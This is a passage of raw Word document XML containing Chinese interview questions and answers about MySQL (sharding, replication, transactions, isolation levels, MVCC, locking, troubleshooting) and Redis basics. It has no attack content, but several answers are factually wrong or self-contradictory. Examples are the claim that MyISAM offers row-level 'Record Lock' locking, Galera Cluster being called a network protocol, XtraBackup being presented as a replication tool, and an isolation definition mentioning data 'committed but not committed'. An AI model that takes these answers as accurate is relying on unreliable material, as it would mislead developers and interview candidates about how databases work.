        <w:t>为维持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树结构，文件的大调整。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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谈谈你对水平切分和垂直切分的理解？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水平切分和垂直切分都是常用的数据库分片技术，用于解决单台数据库服务器无法满足大规模数据存储和高并发访问的需求。</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水平切分，也称为分库，是将同一个表中的数据按照某种规则（如用户ID、时间、地域等）分散到不同的数据库实例中，每个数据库实例只存储部分数据，从而降低单个数据库实例的负载压力。水平切分的优点是可以水平扩展，容易实现负载均衡，但缺点是需要考虑跨节点的事务一致性问题，增加了数据管理的复杂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垂直切分，也称为分表，是将一个大表按照表中字段的关系划分为多个表，每个表只存储部分字段的数据。这样做的好处是可以减小单个表的数据量，提高查询效率和降低存储成本。但垂直切分的缺点是在进行关联查询时需要跨表查询，增加了查询的复杂度，同时也增加了对数据库设计的要求。</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水平切分和垂直切分可以结合使用，即先将数据垂直切分成多个表，再将每个表水平切分到不同的数据库实例中。这样做的好处是可以更好地控制单个数据库实例的负载压力，并且可以灵活地根据业务需求进行扩容和缩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需要注意的是，在进行分片设计时需要考虑到数据一致性、事务处理、跨节点查询、数据迁移等问题，以确保分片方案的可靠性和稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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主从复制中涉及到哪三个线程？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MySQL 主从复制中，涉及到三个线程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Binlog 线程：在主服务器上运行，负责将主服务器上的更新操作记录到二进制日志（binlog）中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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I/O 线程：在从服务器上运行，负责从主服务器上读取二进制日志文件，并写入到从服务器的中继日志（relay log）中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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SQL 线程：在从服务器上运行，负责读取中继日志中的事件，并在从服务器上执行这些事件，从而将主服务器上的更新操作同步到从服务器上。</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这三个线程共同协作，实现主从复制的功能。Binlog 线程在主服务器上记录更新操作，并将二进制日志传输给从服务器；I/O 线程在从服务器上读取二进制日志，将其写入中继日志；SQL 线程在从服务器上执行中继日志中的事件，将更新操作同步到从服务器上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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主从同步的延迟原因及解决办法？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主从同步的延迟可能由多种原因引起，下面列举一些常见的原因和对应的解决办法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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网络延迟：主从服务器之间的网络延迟会导致主从同步延迟。解决办法可以是优化网络环境，增加带宽，或者使用更高效的网络协议（如 Galera Cluster）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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大事务：如果主服务器上执行了大事务，那么在事务提交之前，I/O 线程无法将 binlog 传输给从服务器，从而导致主从同步延迟。解决办法可以是将大事务拆分成小事务，或者使用并行复制的方式，让多个事务同时在主从服务器上执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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从服务器性能问题：如果从服务器的性能较差，无法及时处理 I/O 线程传输的 binlog，或者无法及时执行 SQL 线程中的中继日志，那么就会导致主从同步延迟。解决办法可以是升级硬件、优化 MySQL 配置参数、增加从服务器的数量等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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锁冲突：如果主服务器上的更新操作需要获取锁，而从服务器上的查询操作也需要获取相同的锁，那么就会导致主从同步延迟。解决办法可以是优化 SQL 语句，避免使用锁定表的操作，或者使用不同的隔离级别来避免锁冲突。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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数据库版本差异：如果主从服务器上使用的 MySQL 版本不同，那么可能会导致主从同步延迟。解决办法可以是使用相同版本的 MySQL，或者使用一些兼容性更好的主从同步工具（如 Percona XtraBackup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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谈谈你对数据库读写分离的理解？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据库读写分离是指将数据库的读操作和写操作分别分配到不同的服务器上，从而提高数据库的并发处理能力和性能。通常情况下，写操作的频率比读操作低得多，因此可以将写操作集中在主服务器上，而将读操作分散在多个从服务器上，实现负载均衡和提高吞吐量的目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读写分离的主要优点包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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提高性能：将读操作分配到多个从服务器上可以分散负载，提高系统的并发处理能力和性能，减轻主服务器的压力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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提高可用性：当主服务器出现故障时，可以自动切换到从服务器上，从而保证系统的可用性和数据的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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降低成本：通过分配读操作到廉价的从服务器上，可以降低系统的成本，提高资源利用率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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可扩展性：通过增加从服务器的数量，可以方便地扩展系统的处理能力，应对不断增长的业务需求。</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读写分离的实现方式有多种，例如使用 MySQL 自带的复制功能，将主服务器上的数据同步到从服务器上，并在从服务器上执行读操作；或者使用中间件，如 MySQL Proxy、MyCat、Cobar 等来实现读写分离和负载均衡。无论采用哪种方式，都需要注意一些问题，如数据一致性、主从同步延迟等，以确保系统的稳定性和可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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请你描述下事务的特性？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事务是指一组数据库操作，要么全部执行，要么全部回滚，是保证数据一致性和完整性的重要机制。事务具有以下四个特性（常称为 ACID 特性）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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原子性（Atomicity）：事务中的所有操作要么全部执行，要么全部不执行，不允许部分执行。如果事务在执行过程中出现了错误，那么会回滚到事务开始前的状态，保证事务的原子性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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一致性（Consistency）：事务执行前后，数据库中的数据都必须保持一致性。如果事务执行后出现数据不一致的情况，那么事务必须回滚到执行前的状态，保证数据的一致性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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隔离性（Isolation）：多个事务并发执行时，每个事务都应该感觉不到其他事务的存在。一个事务所做的修改必须要等到提交之后才能被其他事务看到，防止数据出现脏读、不可重复读和幻读等问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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持久性（Durability）：一旦事务提交，对数据库的修改就是永久性的，即使出现系统故障也不会丢失。在事务提交后，数据会被写入磁盘，以保证事务的持久性。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这些特性保证了事务的正确性，也保证了数据的一致性和可靠性。事务的应用范围很广，例如银行转账、在线购物等场景都需要使用事务来保证数据的正确性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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谈谈你对事务隔离级别的理解？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事务隔离级别是数据库系统用来控制并发事务对数据访问冲突的一种机制，它可以控制一个事务是否能够看到另一个事务已经提交但未提交的数据，从而保证事务的隔离性和一致性。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提供了四种隔离级别，分别是读未提交（Read Uncommitted）、读提交（Read Committed）、可重复读（Repeatable Read）和串行化（Serializable）。不同隔离级别之间存在的差异主要体现在以下三个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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脏读：一个事务能否读取到另一个未提交的事务的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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不可重复读：一个事务在执行过程中，读取到了另一个事务已提交的修改数据，导致两次读取结果不一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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幻读：一个事务在执行过程中，读取到了另一个事务已提交的新增数据，导致两次读取结果不一致。</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隔离级别越高，数据的隔离性就越好，但并发性能也越差。在实际应用中，需要根据具体情况选择合适的隔离级别来平衡数据的一致性和并发性能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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解释下什么叫脏读、不可重复读和幻读？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脏读（Dirty Read）：一个事务读取到了另一个事务未提交的数据。假设事务 A 修改了一行数据，但是还没有提交，此时事务 B 读取到了这个未提交的数据，如果此时事务 A 回滚操作，那么事务 B 读取到的就是一个脏数据。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不可重复读（Non-repeatable Read）：一个事务多次读取同一行数据，但是在这个过程中，另一个事务对该行数据进行了修改或删除，导致多次读取的结果不一致。例如，事务 A 第一次读取了一行数据，然后事务 B 修改或删除了该行数据，此时事务 A 再次读取这行数据，结果发现和第一次读取的不一样了，这就是不可重复读。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幻读（Phantom Read）：一个事务两次执行同一个查询，但是在这个过程中，另一个事务对该表进行了插入或删除操作，导致第二次查询出来的行数或者结果不一样。例如，事务 A 第一次查询了表中所有符合条件的行数，然后事务 B 插入了一行符合条件的数据，此时事务 A 再次查询同样的条件，结果发现行数增加了，这就是幻读。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这三个现象都是在多个事务并发访问同一份数据时可能出现的问题。数据库系统通过提供不同的事务隔离级别来解决这些问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MySQL 默认的隔离级别是什么？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默认的隔离级别是可重复读（Repeatable Read）。</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可重复读隔离级别下，事务执行期间读取的所有数据都是基于事务开始时的一个一致性视图，即事务启动后其他事务对数据的修改不会被该事务看到。这保证了每个事务中的查询结果是稳定的，但也可能导致幻读问题，即一个事务执行期间，另一个事务插入了一些符合该事务条件的记录，但该事务却无法看到这些记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可重复读是一个相对严格的隔离级别，可以保证数据的一致性和事务的隔离性，但也会降低并发性能。如果应用程序对并发性能要求较高，可以考虑使用更低的隔离级别，如读提交（Read Committed）或未提交读（Read Uncommitted），但需要注意这些隔离级别可能会出现不可重复读或脏读等问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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谈谈你对MVCC 的了解？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MVCC 是 MySQL 中实现事务隔离级别的一种技术，全称为“Multi-Version Concurrency Control”，即多版本并发控制。MVCC 技术主要是为了解决并发操作下的读写冲突问题，以提高并发度和系统的性能。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MVCC 中，每个事务对应的数据都会有一个版本号，通过版本号来实现事务之间的隔离。读操作只能读取当前版本之前提交的数据，而写操作则会生成一个新的版本号，只有在该版本之后的读操作才能看到修改后的数据。这种机制可以避免读写冲突，提高系统的并发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在实现 MVCC 的过程中，MySQL 中的 InnoDB 存储引擎使用了多种数据结构来管理事务和数据版本的关系，其中最重要的是 undo log 和 read view。</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undo log 是 InnoDB 存储引擎中的一个日志文件，用于记录事务对数据的修改操作。在每次事务执行写操作时，会生成一个新的版本号，并将该版本号和对应的修改操作记录到 undo log 中。这样，在之后的读操作中，就可以根据版本号查询 undo log 来恢复历史版本的数据。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read view 是用于控制事务对数据可见性的数据结构，用于判断当前事务是否能够读取某个数据版本。read view 包括一个数组，记录了每个事务开始时对应的数据库状态的版本号，以及一个系统版本号，表示当前的数据库状态。在每个读操作开始时，系统会根据事务开始时间和当前系统版本号来判断事务能够读取哪些数据版本。</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总的来说，MVCC 技术是一种高效的并发控制技术，能够提高数据库的并发度和性能。在 MySQL 中，InnoDB 存储引擎广泛使用 MVCC 技术来实现事务隔离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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说一下 MySQL 的行锁和表锁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中的锁可以分为行级锁和表级锁两种类型。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行级锁是针对数据表中的单行记录进行锁定，只有在执行 SQL 操作的时候才会获取锁，并在操作完成后释放锁。行级锁可以提高并发度，降低锁的冲突，但会增加系统的开销。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中实现行级锁主要有两种方式：锁的实现方式是通过在 InnoDB 存储引擎中的 Next-Key Lock 实现的，这种锁包括索引记录锁和间隙锁；另一种方式是通过在 MyISAM 存储引擎中的 Record Lock 实现的，这种锁只能锁定整个记录，不支持间隙锁。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与行级锁相对应的是表级锁，表级锁是指锁定整个表，不管执行的操作是针对哪些行的。因为锁的粒度较大，所以表级锁的并发度较低，容易造成锁等待，影响系统性能。在 MySQL 中，MyISAM 存储引擎常常采用表级锁来实现并发控制。MyISAM 存储引擎提供了两种类型的表级锁：表共享读锁和表排他写锁。当一个线程获取了表的写锁时，其他线程就不能再获取表的任何锁，包括读锁和写锁。表共享读锁可以被多个线程同时获取，但是写锁是独占的。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InnoDB 存储引擎中的行级锁是 MySQL 中最常用的一种锁，它的并发度更高，避免了表锁带来的严重性能问题。但是，在一些特定的情况下，如批量的大数据修改或者数据导入操作，表级锁可能比行级锁更适合，因为表级锁可以锁住整个表，保证数据的一致性。因此，在 MySQL 中使用锁的时候需要根据具体的应用场景来选择合适的锁策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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InnoDB 存储引擎的锁的算法有哪些？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InnoDB 存储引擎采用了多种锁的算法来实现并发控制，这些算法包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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共享锁和排他锁：这是最基本的锁算法，共享锁（Shared Lock）允许多个事务同时读取同一份数据，而排他锁（Exclusive Lock）则要求对同一份数据进行修改或写入时只能有一个事务进行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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行级锁：行级锁（Row-Level Locking）是 InnoDB 存储引擎的特色之一，它可以在数据库表中针对单独的行进行锁定。这种锁算法可以提高并发度，避免锁表现象，但也会增加锁的粒度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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间隙锁：间隙锁（Gap Lock）是 InnoDB 存储引擎为了避免幻读（Phantom Read）而引入的一种锁算法。它可以锁定一个索引范围，但是不包含实际存在的数据行。这样可以防止其他事务在锁定范围内插入新行或删除行，从而避免幻读的产生。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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临键锁：临键锁（Next-Key Lock）是 InnoDB 存储引擎对间隙锁的一种改进。它除了锁定索引范围之外，还会锁定实际存在的数据行。这种锁算法可以有效避免幻读和重复读（Duplicate Read）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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表级锁：表级锁（Table-Level Locking）是一种较为简单的锁算法，它将整个表加锁，不允许其他事务进行任何读写操作。由于锁的粒度过大，表级锁会造成严重的并发瓶颈，因此在实际应用中应该尽量避免使用。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在实际应用中，InnoDB 存储引擎会根据具体的操作和数据情况选择合适的锁算法来进行并发控制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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MySQL 问题排查都有哪些手段？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MySQL 问题排查是数据库运维和开发工作中非常重要的一环，下面列出了一些常见的 MySQL 问题排查手段：</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查看 MySQL 的错误日志：MySQL 会在错误发生时记录在错误日志中，可以查看日志中的错误信息来定位问题。</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查看 slow query 日志：MySQL 会记录执行时间较长的 SQL 查询，可以通过查看 slow query 日志来找到执行时间较长的 SQL，以便进行优化。</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执行 SHOW PROCESSLIST 命令：该命令可以查看当前正在执行的 SQL，以及该 SQL 所占用的资源和执行时间等信息，用于查找正在运行的问题 SQL。</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EXPLAIN 命令：该命令可以帮助分析 SQL 查询语句的执行计划，以便优化查询性能。</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Performance Schema 工具：Performance Schema 是 MySQL 提供的一个性能分析工具，可以用于监控 MySQL 数据库的资源使用情况。</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 Profiling 工具：Profiling 工具可以帮助记录 MySQL 数据库中每个查询所使用的资源，如执行时间、锁定时间、扫描的行数等信息，以便进行性能调优。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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使用数据库性能监控工具：如 Zabbix、Nagios 等可以监控 MySQL 数据库的运行状态，如 CPU、内存、磁盘、网络等指标，以及 SQL 查询的执行时间和响应时间等信息。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总的来说，MySQL 问题排查需要结合多种手段，从不同角度去分析和定位问题，找到问题的根本原因并及时解决。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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MySQL 数据库 CPU 飙升到 500% 的话他怎么处理？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当MySQL数据库的CPU使用率飙升到500%时，需要采取以下措施来处理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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确定CPU使用率的原因：首先需要确定是哪些进程占用了CPU，以及它们占用CPU的原因。可以使用操作系统提供的工具，例如top、htop、ps等工具，来查看进程占用情况。也可以使用MySQL提供的工具，例如show processlist、show full processlist等命令，来查看MySQL进程的状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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优化SQL语句：如果MySQL进程是由于查询操作导致的CPU使用率过高，那么需要优化查询语句。可以通过使用索引、减少查询返回的数据量、避免使用子查询等方法来优化SQL语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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调整数据库配置：可以调整MySQL的配置参数，例如缓存大小、最大连接数等参数，来提高MySQL的性能。可以根据实际情况进行调整，避免过度调整导致系统不稳定。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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升级硬件：如果以上方法都无法解决问题，那么可能需要升级硬件，例如增加CPU核心数、增加内存等，来提高MySQL的性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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联系MySQL支持团队：如果无法解决问题，可以联系MySQL的支持团队，寻求他们的帮助。</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总之，处理MySQL CPU使用率过高的问题需要根据具体情况进行分析和处理，采取合适的措施来解决问题。</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八、Redis 12 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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谈下你对 Redis 的了解？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Redis是一个开源的高性能键值存储数据库，支持多种数据结构，如字符串，哈希，列表，集合和有序集合等。它通常被用作缓存，消息代理和排行榜等。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Redis的优点包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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高性能：Redis是内存数据库，读写速度非常快，可以达到几十万次每秒。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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多种数据结构：Redis支持多种数据结构，可以满足不同的应用需求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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支持事务和持久化：Redis支持事务，可以将一系列命令封装成一个事务进行执行，保证数据的一致性。同时，Redis还支持多种持久化方式，如RDB和AOF。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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分布式：Redis可以通过分片或者复制等方式实现分布式存储，提高了数据的可靠性和可扩展性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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简单易用：Redis的命令简单明了，易于学习和使用。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但是Redis也有一些缺点，比如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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内存限制：Redis是内存数据库，存储的数据不能超过内存的容量，因此不能存储过大的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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单线程模型：Redis的单线程模型可能会在高并发情况下造成性能瓶颈。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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数据库大小限制：由于Redis使用内存存储数据，因此数据库的大小受到内存容量的限制。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综上所述，Redis是一个高性能，可扩展，易于使用的键值存储数据库，但需要注意其内存和单线程模型等限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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一般都有哪些使用场景？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Redis有很多使用场景，以下是一些常见的场景：</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缓存：Redis最常见的用途是作为缓存，可以将经常读取的数据存储在Redis中，减少读取数据库的次数，提高性能。Redis通过支持过期时间和LRU淘汰算法等机制，可以实现自动缓存数据的更新和清理。</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消息队列：Redis的发布订阅模式和列表数据结构可以用于构建消息队列。生产者将消息发布到Redis中的频道，消费者从频道订阅消息，当有新的消息发布到频道时，消费者会收到通知并消费消息。</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计数器和排行榜：Redis的计数器和有序集合数据结构可以用于实现排行榜功能。通过将对象和对应的分值存储在有序集合中，可以快速进行排名和排行榜的查询。</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分布式锁：Redis的原子性操作和过期时间等特性可以用于构建分布式锁，保证多个进程或者线程之间的互斥访问。</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会话管理：Redis可以作为会话存储，存储用户的会话状态和信息，提高系统的可扩展性和性能。</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地理位置搜索：Redis支持地理位置索引，可以存储地理位置信息和半径查询，用于实现附近的人、商家和地点等功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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持久化存储：Redis支持RDB和AOF两种持久化方式，可以将数据存储到磁盘上，保证数据的持久性和可靠性。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综上所述，Redis具有多种使用场景，可以用于构建缓存、消息队列、计数器、排行榜、分布式锁、会话管理、地理位置搜索和持久化存储等应用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
